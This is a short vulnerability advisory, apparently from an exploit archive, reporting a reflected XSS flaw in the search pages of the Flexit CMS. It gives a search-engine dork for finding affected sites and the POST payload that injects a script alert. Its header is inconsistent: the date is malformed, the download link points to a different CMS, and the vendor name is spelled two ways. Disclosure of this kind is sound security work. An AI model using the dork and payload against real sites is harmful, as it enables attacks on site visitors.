CMS - Flexit - XSS Reflected
Posted on 30 November -0001
<HTML><HEAD><TITLE>CMS - Flexit - XSS Reflected</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Title: XSS vuln in Flexit ! Author: NETFIS Date: 02/08/2016 Download Site: https://dotclear.org/download Vendor: NETFIS Vendor Notified: 02/08/2016 ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Description : FlexIT est une offre associant des outils et des services pour vous permettre de créer et de gérer votre site Internet professionnel, sans connaissance technique particulière. ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Vulnerability : Dork : intext:"Imaginé par NEFTIS - CMS : Flexit©" This XSS is on the search engine here : /fr/recherche.html or here : /fr/recherche-1.html ! POST DATA : recherche=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&page_rech=&clic=1&aff_langue=&debut=1 Or on the search engine : <script>alert(1)</script> ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- </BODY></HTML>
